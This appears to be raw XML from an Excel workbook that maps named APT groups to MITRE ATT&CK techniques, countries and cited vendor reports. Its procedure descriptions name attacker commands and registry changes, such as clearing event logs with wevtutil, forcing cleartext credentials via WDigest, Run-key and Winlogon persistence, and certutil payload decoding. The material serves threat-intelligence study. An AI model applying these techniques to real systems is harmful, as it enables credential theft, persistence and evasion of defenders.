    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog</t>
  </si>
  <si>
    <t>https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)</t>
  </si>
  <si>
    <t>https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/</t>
  </si>
  <si>
    <t>https://www.xorrior.com/No-Place-Like-Chrome/</t>
  </si>
  <si>
    <t>https://www.xorrior.com/emond-persistence/</t>
  </si>
  <si>
    <t>https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/</t>
  </si>
  <si>
    <t>country</t>
  </si>
  <si>
    <t>South America</t>
  </si>
  <si>
    <t>China</t>
  </si>
  <si>
    <t>Unknown</t>
  </si>
  <si>
    <t>Russia</t>
  </si>
  <si>
    <t>Vietnam</t>
  </si>
  <si>
    <t>Iran</t>
  </si>
  <si>
    <t>North Korea</t>
  </si>
  <si>
    <t>South Asia</t>
  </si>
  <si>
    <t>Middle East</t>
  </si>
  <si>
    <t>Lebanon</t>
  </si>
  <si>
    <t>South Korea</t>
  </si>
  <si>
    <t>Pakistan</t>
  </si>
  <si>
    <t>India</t>
  </si>
  <si>
    <t>Nigeria</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used wmic.exe to add a new user to the system.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>techniqueID</t>
  </si>
  <si>
    <t>comment</t>
  </si>
  <si>
    <t>GroupID</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a Powershell cmdlet to grant the ApplicationImpersonation role to a compromised account.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan adds the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.(Citation: ESET Sednit Part 1)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.(Citation: Crowdstrike DNC June 2016)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\Software\Microsoft\Office test\Special\Perf to execute code.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) executed [CHOPSTICK](https://attack.mitre.org/software/S0023) by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. [APT28](https://attack.mitre.org/groups/G0007) also executed a .dll for a first stage dropper using rundll32.exe. An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.(Citation: Crowdstrike DNC June 2016)(Citation: Bitdefender APT28 Dec 2015)(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit 42 Playbook Dec 2017)(Citation: ESET Zebrocy May 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained a list of users and their roles from an Exchange server using Get-ManagementRoleAssignment.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used PowerShell to discover domain accounts by executing Get-ADUser and Get-ADGroupMember.(Citation: CrowdStrike StellarParticle January 2022)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) added their own devices as allowed IDs for active sync using Set-CASMailbox, allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.(Citation: Volexity SolarWinds)(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) registered devices in order to enable mailbox syncing via the Set-CASMailbox command.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used cmd.exe to execute commands on remote machines.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used the Get-AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell.(Citation: Volexity SolarWinds) They also used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domains and to discover trust between federated domains.(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) collected emails from specific individuals, such as executives and IT staff, using New-MailboxExportRequest followed by Get-MailboxExportRequest.(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained information about the configured Exchange virtual directory using Get-WebServicesVirtualDirectory.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used AUDITPOL to prevent the collection of audit logs.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used netsh to configure firewall rules that limited certain UDP outbound packets.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) removed evidence of email export requests using Remove-MailboxExportRequest.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) named tasks \Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager in order to appear legitimate.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used the Get-ManagementRoleAssignment PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used scheduler and schtasks to create new tasks on remote hosts as part of lateral movement.(Citation: Volexity SolarWinds) They have manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.(Citation: FireEye SUNBURST Backdoor December 2020) [APT29](https://attack.mitre.org/groups/G0016) also created a scheduled task to maintain [SUNSPOT](https://attack.mitre.org/software/S0562) persistence when the host booted during the 2020 SolarWinds intrusion.(Citation: CrowdStrike SUNSPOT Implant January 2021) They previously used named and hijacked scheduled tasks to also establish persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used Rundll32.exe to execute payloads.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used fsutil to check available free space before executing actions that might create large files on disk.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used stolen cookies to access cloud resources, and a forged duo-sid cookie to bypass MFA set on an email account.(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) used the command query user on victim hosts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used hidcon to run batch files in a hidden console window.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a Microsoft.Office.Interop object.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used legitimate process names to hide malware including svchosst.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has removed security settings for VBA macro execution by changing registry values HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\VBAWarnings and HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\AccessVBOM.(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used CreateProcess to launch additional malicious components.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has inserted malicious macros into existing documents, providing persistence when they are reopened. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) used cmd.exe /c within a malicious macro.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) used the sp_addlinkedsrvlogin command in MS-SQL to create a link between a created account and other servers in the network.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has run the  xp_cmdshell command in MS-SQL.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) added a login to a SQL Server with sp_addlinkedsrvlogin.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has run net use to connect to network shares.(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified and added entries within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to maintain persistence.(Citation: FireEye TRITON 2019)	
</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used net user to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used net user /domain to enumerate domain accounts.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>A [Turla](https://attack.mitre.org/groups/G0010) Javascript backdoor added a local_update_check value under the Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence. Additionally, a [Turla](https://attack.mitre.org/groups/G0010) custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) established persistence by adding a Shell value under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the lPH*.dll pattern.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover Group Policy details using the gpresult command.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used encryption (including salted 3DES via [PowerSploit](https://attack.mitre.org/software/S0194)'s Out-EncryptedScript.ps1), random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used net accounts and net accounts /domain to acquire password policy information.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used fsutil fsinfo drives to list connected drives.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used net group "Domain Admins" /domain to identify domain administrators.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running processes using the tasklist /v command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated processes associated with specific open ports or named pipes.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has also used [PowerSploit](https://attack.mitre.org/software/S0194)'s Invoke-ReflectivePEInjection.ps1 to reflectively load a PowerShell payload into a random process on the victim system.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover information in the Windows Registry with the reg query command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) used net use commands to connect to lateral systems within a network.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands. [Turla](https://attack.mitre.org/groups/G0010) has also used net group "Domain Computers" /domain, net group "Domain Controllers" /domain, and net group "Exchange Servers" /domain to enumerate domain computers, including the organization's DC and Exchange Server.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, net config, ipconfig /all, and route commands, as well as [NBTscan](https://attack.mitre.org/software/S0590).(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used tracert to check internet connectivity.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running services and associated processes using the tasklist /svc command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover the system time by using the net time command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used [AdFind](https://attack.mitre.org/software/S0552) and nltest/dclist to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>G0132</t>
  </si>
  <si>
    <t>G0074</t>
  </si>
  <si>
    <t>groups</t>
  </si>
  <si>
    <t>APT Name</t>
  </si>
  <si>
    <t>Software Used</t>
  </si>
  <si>
    <t>Techniques Used</t>
  </si>
  <si>
    <t>Group ID</t>
  </si>
  <si>
    <t>Associated Groups</t>
  </si>
  <si>
    <t>Country</t>
  </si>
  <si>
    <t>Tactics Used</t>
  </si>
  <si>
    <t>Search By</t>
  </si>
  <si>
    <t>Associated Country</t>
  </si>
  <si>
    <t>Mitigation Method</t>
  </si>
  <si>
    <t>APT Group ID</t>
  </si>
  <si>
    <t xml:space="preserve">Software/Malware Used </t>
  </si>
  <si>
    <t>APT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u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.79998168889431442"/>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2" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="13">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="7" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="24">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alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="1" hidden="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alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="1" hidden="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alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="1" hidden="0"/>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alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="1" hidden="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alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="1" hidden="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0</xdr:row>
          <xdr:rowOff>179295</xdr:rowOff>
        </xdr:from>
        <xdr:to>
          <xdr:col>3</xdr:col>
          <xdr:colOff>1066800</xdr:colOff>
          <xdr:row>1</xdr:row>
          <xdr:rowOff>252806</xdr:rowOff>
        </xdr:to>
        <xdr:sp macro="" textlink="">
          <xdr:nvSpPr>
            <xdr:cNvPr id="2049" name="TextBox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CD7994-C8F6-4CF6-AA4B-9A8047B44A9F}" name="Table2" displayName="Table2" ref="A4:G5" totalsRowShown="0">
  <autoFilter ref="A4:G5" xr:uid="{33CD7994-C8F6-4CF6-AA4B-9A8047B44A9F}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{328292E3-AB1E-4F48-B7F8-A612337859B1}" name="APT Name"/>
    <tableColumn id="2" xr3:uid="{84979F3C-031F-445F-B4FB-C8472904021E}" name="Group ID"/>
    <tableColumn id="3" xr3:uid="{1517F7F8-B15D-4317-B7C7-DAF7E5889BC9}" name="Associated Groups"/>
    <tableColumn id="4" xr3:uid="{8AE7D5D9-670E-4177-9EE2-CA8C399A3D40}" name="Country"/>
    <tableColumn id="5" xr3:uid="{2F56DEB2-C723-407C-BBFD-53F9F0FDEDF0}" name="Software Used"/>
    <tableColumn id="6" xr3:uid="{044F124D-310B-4A4A-9249-7D4EA2C6EF4D}" name="Tactics Used"/>
    <tableColumn id="7" xr3:uid="{EAE6D88D-C12B-4CCC-8CF2-3F3F90C999A6}" name="Techniques Used"/>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E945C21-5299-4733-BD07-2D274923428B}" name="Table13" displayName="Table13" ref="A1:D757" totalsRowShown="0">
  <autoFilter ref="A1:D757" xr:uid="{DE945C21-5299-4733-BD07-2D274923428B}"/>
  <tableColumns count="4">
    <tableColumn id="1" xr3:uid="{7A714A21-5E95-488E-B174-CE5F68F3F5DF}" name="GroupID"/>
    <tableColumn id="4" xr3:uid="{D363F899-9A7D-47B0-89B9-F20C9ACEDC58}" name="target type"/>
    <tableColumn id="2" xr3:uid="{3A9744BF-16C4-432F-AA6F-DB83F84160DC}" name="techniqueID"/>
    <tableColumn id="3" xr3:uid="{F88AACF4-148C-45AF-B33B-460588BF8E9D}" name="comment"/>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1424B5C-5141-4907-BDFF-51BC6F0D94E0}" name="Table14" displayName="Table14" ref="A1:V595" totalsRowShown="0" headerRowDxfId="23" headerRowBorderDxfId="22" tableBorderDxfId="21">
  <autoFilter ref="A1:V595" xr:uid="{A1424B5C-5141-4907-BDFF-51BC6F0D94E0}">
    <filterColumn colId="7">
      <filters>
        <filter val="Collection"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <tableColumns count="22">
    <tableColumn id="1" xr3:uid="{36E60D5A-CE8C-423D-963E-EFA44A53C16B}" name="ID"/>
    <tableColumn id="2" xr3:uid="{2C2A83EB-18DF-4542-A625-AEB6E7C3D0F5}" name="name"/>
    <tableColumn id="3" xr3:uid="{31F714FC-8885-4E0D-893B-92D31E7D5D1F}" name="description"/>
    <tableColumn id="4" xr3:uid="{4A3DA842-C000-4E76-8078-5B492897C334}" name="url" dataDxfId="20" dataCellStyle="Hyperlink"/>
    <tableColumn id="5" xr3:uid="{01AE8756-72C7-47FE-9584-AA776E66F909}" name="created"/>
    <tableColumn id="6" xr3:uid="{D055A82C-4E63-43C6-8877-F94882A80ED1}" name="last modified"/>
    <tableColumn id="7" xr3:uid="{5186D8EF-787D-4082-936F-484C0F0F4A58}" name="version"/>
    <tableColumn id="8" xr3:uid="{E86D999B-E1B0-4F94-95DA-35B02B7214CB}" name="tactics"/>
    <tableColumn id="9" xr3:uid="{2B931836-C9D9-4169-BD5A-26361085BE54}" name="detection"/>
    <tableColumn id="10" xr3:uid="{76C59160-CEB2-4C16-8B5D-797EC6CB9EFD}" name="platforms"/>
    <tableColumn id="11" xr3:uid="{ABEC6432-2704-4FCB-BA30-245A5A33485D}" name="data sources"/>
    <tableColumn id="12" xr3:uid="{2C4A48FE-CEB5-4A37-9E36-DDC0CF60FD5B}" name="is sub-technique"/>
    <tableColumn id="13" xr3:uid="{59421904-0744-43AC-9332-8EF0033934E1}" name="sub-technique of"/>
    <tableColumn id="14" xr3:uid="{F9097BA6-17A4-4E6D-9590-39824963183A}" name="defenses bypassed"/>
    <tableColumn id="15" xr3:uid="{D5321DFB-05AE-4195-A4D2-9AC4611D5B00}" name="contributors"/>
    <tableColumn id="16" xr3:uid="{134E224B-3386-4680-8F7C-C21EBCAD8293}" name="permissions required"/>
    <tableColumn id="17" xr3:uid="{A72C3285-DAB8-43E8-BF52-18093F84E46E}" name="supports remote"/>
    <tableColumn id="18" xr3:uid="{1F2BD76E-3A56-4D7F-AB0B-B699114DFF3B}" name="system requirements"/>
    <tableColumn id="19" xr3:uid="{36606D42-731F-4D0A-9E7A-1959492DBF1F}" name="CAPEC ID"/>
    <tableColumn id="20" xr3:uid="{0AC5F034-F94C-48A8-8892-8A68F6096895}" name="impact type"/>
    <tableColumn id="21" xr3:uid="{2320B85A-2462-48CE-B9EA-3AA3B27A4567}" name="effective permissions"/>
    <tableColumn id="22" xr3:uid="{5568093A-46F3-4B02-80FF-07EC25C8943A}" name="relationship citations"/>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67654F6-1A6B-4892-83E1-72E65EBEAC5B}" name="Table15" displayName="Table15" ref="A1:G15" totalsRowShown="0" headerRowDxfId="19" headerRowBorderDxfId="18" tableBorderDxfId="17">
  <autoFilter ref="A1:G15" xr:uid="{367654F6-1A6B-4892-83E1-72E65EBEAC5B}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{76C93E1D-FDC2-414D-9EF9-547C2F9EA0E1}" name="ID"/>
    <tableColumn id="2" xr3:uid="{E247C121-3416-41EB-9335-7471C655FB6C}" name="name"/>
    <tableColumn id="3" xr3:uid="{894E5C4D-E2D5-48DD-BA77-DF3084DEA371}" name="description"/>
    <tableColumn id="4" xr3:uid="{02B240B3-729A-44B9-910A-F88D64E8E456}" name="url" dataDxfId="16" dataCellStyle="Hyperlink"/>
    <tableColumn id="5" xr3:uid="{A68C7B14-220E-4894-893B-A46600B30576}" name="created"/>
    <tableColumn id="6" xr3:uid="{5C4962D6-B938-43D6-9A6B-3C534560475F}" name="last modified"/>
    <tableColumn id="7" xr3:uid="{B8D1B422-34B8-4EFD-82EA-6C4C1B608CEF}" name="versio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6338D4D-0B9D-46B6-8076-6D29A444851A}" name="Table16" displayName="Table16" ref="A1:M1048576" totalsRowShown="0" headerRowDxfId="15" headerRowBorderDxfId="14" tableBorderDxfId="13">
  <autoFilter ref="A1:M1048576" xr:uid="{A6338D4D-0B9D-46B6-8076-6D29A444851A}"/>
  <tableColumns count="13">
    <tableColumn id="1" xr3:uid="{26B8E7C4-1AD6-4682-B141-F6D1F2917E54}" name="ID"/>
    <tableColumn id="2" xr3:uid="{BE27C875-4B77-40EB-A4E8-0D10E0705542}" name="name"/>
    <tableColumn id="13" xr3:uid="{130A633D-8597-47A7-BD2B-24A32F75AF66}" name="groups" dataDxfId="12"/>
    <tableColumn id="3" xr3:uid="{09BE7CC4-D7F3-4C1A-A368-5856725A037B}" name="description"/>
    <tableColumn id="4" xr3:uid="{467D32BF-DE70-4CA8-BF65-13E2D261F6CE}" name="url" dataDxfId="11" dataCellStyle="Hyperlink"/>
    <tableColumn id="5" xr3:uid="{498DED42-C1E8-4CF5-929F-025C9FACBFD6}" name="created"/>
    <tableColumn id="6" xr3:uid="{D91EB04B-71DA-4F91-950E-704EC413C053}" name="last modified"/>
    <tableColumn id="7" xr3:uid="{6EBDF014-01A2-4560-ACD0-013D2ED33874}" name="version"/>
